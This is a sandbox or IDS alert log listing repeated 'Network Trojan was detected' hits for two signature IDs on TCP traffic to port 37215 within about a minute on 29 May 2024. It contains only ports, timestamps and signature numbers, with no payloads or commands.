                SID:2829579
                Source Port:48956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498175
                SID:2829579
                Source Port:46918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873482
                SID:2829579
                Source Port:46718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653303
                SID:2835222
                Source Port:59462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532404
                SID:2829579
                Source Port:33116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984951
                SID:2835222
                Source Port:39856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363086
                SID:2829579
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974242
                SID:2835222
                Source Port:35482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810175
                SID:2829579
                Source Port:50350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640539
                SID:2829579
                Source Port:46926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140913
                SID:2829579
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462240
                SID:2829579
                Source Port:40332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987868
                SID:2835222
                Source Port:51958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645128
                SID:2835222
                Source Port:60940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845203
                SID:2835222
                Source Port:50860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823510
                SID:2835222
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557004
                SID:2829579
                Source Port:38906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556651
                SID:2835222
                Source Port:58144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335706
                SID:2829579
                Source Port:41578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560156
                SID:2835222
                Source Port:56440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036967
                SID:2835222
                Source Port:53812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321669
                SID:2829579
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614402
                SID:2829579
                Source Port:49562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796666
                SID:2829579
                Source Port:60868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765729
                SID:2835222
                Source Port:35572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663911
                SID:2829579
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180476
                SID:2829579
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975241
                SID:2835222
                Source Port:41878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422561
                SID:2829579
                Source Port:46140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844129
                SID:2829579
                Source Port:36928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689106
                SID:2829579
                Source Port:42042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559298
                SID:2835222
                Source Port:50528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785884
                SID:2829579
                Source Port:40846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571189
                SID:2835222
                Source Port:50294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656162
                SID:2829579
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722093
                SID:2829579
                Source Port:36044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500525
                SID:2835222
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787118
                SID:2829579
                Source Port:49928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787723
                SID:2835222
                Source Port:42086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502138
                SID:2829579
                Source Port:50448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583450
                SID:2835222
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178687
                SID:2835222
                Source Port:41998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034638
                SID:2829579
                Source Port:55210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038456
                SID:2835222
                Source Port:34772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363343
                SID:2835222
                Source Port:58824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881323
                SID:2835222
                Source Port:35468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416285
                SID:2835222
                Source Port:54674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872867
                SID:2829579
                Source Port:37224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804251
                SID:2835222
                Source Port:51786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712418
                SID:2835222
                Source Port:57154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011011
                SID:2835222
                Source Port:39074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614272
                SID:2835222
                Source Port:54278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561923
                SID:2829579
                Source Port:59822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901035
                SID:2829579
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223419
                SID:2835222
                Source Port:40696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141182
                SID:2835222
                Source Port:37832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164847
                SID:2829579
                Source Port:52382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240872
                SID:2829579
                Source Port:57768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897287
                SID:2835222
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437806
                SID:2829579
                Source Port:50868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559313
                SID:2829579
                Source Port:59278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282404
                SID:2829579
                Source Port:58472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384339
                SID:2835222
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715399
                SID:2829579
                Source Port:33378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161259
                SID:2829579
                Source Port:52634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808445
                SID:2829579
                Source Port:50246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617943
                SID:2829579
                Source Port:39128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519868
                SID:2835222
                Source Port:45950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868815
                SID:2835222
                Source Port:36172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175677
                SID:2835222
                Source Port:55896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848878
                SID:2829579
                Source Port:60952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207590
                SID:2829579
                Source Port:56344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979302
                SID:2829579
                Source Port:40522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226808
                SID:2835222
                Source Port:42510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720060
                SID:2829579
                Source Port:46560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339053
                SID:2835222
                Source Port:43470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.861587
                SID:2829579
                Source Port:56336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287427
                SID:2829579
                Source Port:37050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059780
                SID:2829579
                Source Port:59588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.326126
                SID:2829579
                Source Port:60770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547526
                SID:2835222
                Source Port:43812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659228
                SID:2835222
                Source Port:35130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841499
                SID:2829579
                Source Port:57428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787312
                SID:2829579
                Source Port:45324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436161
                SID:2835222
                Source Port:50928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957513
                SID:2829579
                Source Port:48190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076215
                SID:2829579
                Source Port:46110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856077
                SID:2829579
                Source Port:37428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286484
                SID:2835222
                Source Port:32986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765233
                SID:2829579
                Source Port:33006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945623
                SID:2835222
                Source Port:34412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858081
                SID:2829579
                Source Port:42224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282040
                SID:2829579
                Source Port:41708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101409
                SID:2829579
                Source Port:44432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161039
                SID:2829579
                Source Port:59530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941678
                SID:2835222
                Source Port:58350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362730
                SID:2829579
                Source Port:41016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.980920
                SID:2829579
                Source Port:45712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854260
                SID:2835222
                Source Port:44604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441600
                SID:2829579
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858851
                SID:2835222
                Source Port:57406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886039
                SID:2835222
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765545
                SID:2835222
                Source Port:41826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876214
                SID:2835222
                Source Port:35104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223970
                SID:2835222
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868356
                SID:2829579
                Source Port:53450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796782
                SID:2835222
                Source Port:35972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441167
                SID:2829579
                Source Port:34816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229167
                SID:2829579
                Source Port:54116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722111
                SID:2835222
                Source Port:43702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665477
                SID:2835222
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234290
                SID:2835222
                Source Port:35318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375576
                SID:2835222
                Source Port:58992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363502
                SID:2835222
                Source Port:41938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624898
                SID:2835222
                Source Port:43656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615106
                SID:2829579
                Source Port:54424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664278
                SID:2829579
                Source Port:57174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222773
                SID:2829579
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335961
                SID:2835222
                Source Port:56390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841851
                SID:2835222
                Source Port:50960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612976
                SID:2835222
                Source Port:59142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528012
                SID:2835222
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965414
                SID:2829579
                Source Port:50242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993736
                SID:2835222
                Source Port:54198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176845
                SID:2835222
                Source Port:60048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809237
                SID:2829579
                Source Port:39588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386355
                SID:2829579
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070157
                SID:2829579
                Source Port:45568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896948
                SID:2829579
                Source Port:45412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155687
                SID:2835222
                Source Port:58642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035614
                SID:2829579
                Source Port:35392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868915
                SID:2829579
                Source Port:48664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.921088
                SID:2829579
                Source Port:44028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965856
                SID:2829579
                Source Port:37024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572365
                SID:2835222
                Source Port:45014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836661
                SID:2829579
                Source Port:35836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179730
                SID:2835222
                Source Port:46896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042078
                SID:2829579
                Source Port:36572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900341
                SID:2829579
                Source Port:58284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280862
                SID:2829579
                Source Port:46834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889919
                SID:2835222
                Source Port:53446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980143
                SID:2829579
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161092
                SID:2829579
                Source Port:54714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720125
                SID:2835222
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135342
                SID:2835222
                Source Port:36486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535668
                SID:2829579
                Source Port:42532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987383
                SID:2835222
                Source Port:55212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331709
                SID:2835222
                Source Port:39196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374462
                SID:2829579
                Source Port:53264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929640
                SID:2835222
                Source Port:44556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593638
                SID:2835222
                Source Port:60840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582950
                SID:2829579
                Source Port:40766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789264
                SID:2835222
                Source Port:53850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955908
                SID:2835222
                Source Port:51538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711026
                SID:2829579
                Source Port:36092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992773
                SID:2829579
                Source Port:41966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668629
                SID:2835222
                Source Port:46316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726334
                SID:2835222
                Source Port:52020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847169
                SID:2829579
                Source Port:57618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685022
                SID:2835222
                Source Port:60714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232083
                SID:2829579
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959095
                SID:2835222
                Source Port:34870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808673
                SID:2835222
                Source Port:33450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728252
                SID:2829579
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617778
                SID:2835222
                Source Port:51396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945165
                SID:2829579
                Source Port:41006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815599
                SID:2835222
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836248
                SID:2835222
                Source Port:57128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840370
                SID:2829579
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817982
                SID:2835222
                Source Port:48210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422153
                SID:2829579
                Source Port:55510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325730
                SID:2829579
                Source Port:57744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339328
                SID:2835222
                Source Port:44252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968293
                SID:2835222
                Source Port:40042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858462
                SID:2829579
                Source Port:57194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802765
                SID:2835222
                Source Port:32934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447443
                SID:2829579
                Source Port:47084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460574
                SID:2835222
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779729
                SID:2829579
                Source Port:52550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978137
                SID:2835222
                Source Port:47962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867862
                SID:2829579
                Source Port:58362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800505
                SID:2829579
                Source Port:58364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950244
                SID:2835222
                Source Port:44900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859644
                SID:2829579
                Source Port:60774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726350
                SID:2835222
                Source Port:49628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914943
                SID:2835222
                Source Port:39002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574510
                SID:2835222
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732380
                SID:2835222
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804273
                SID:2835222
                Source Port:39998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288960
                SID:2829579
                Source Port:37716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885863
                SID:2835222
                Source Port:47364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215397
                SID:2835222
                Source Port:48280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418066
                SID:2829579
                Source Port:47500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521367
                SID:2829579
                Source Port:45734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667760
                SID:2835222
                Source Port:60074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839776
                SID:2835222
                Source Port:59216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660011
                SID:2835222
                Source Port:57266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325578
                SID:2829579
                Source Port:36276
                Destination Port:37215
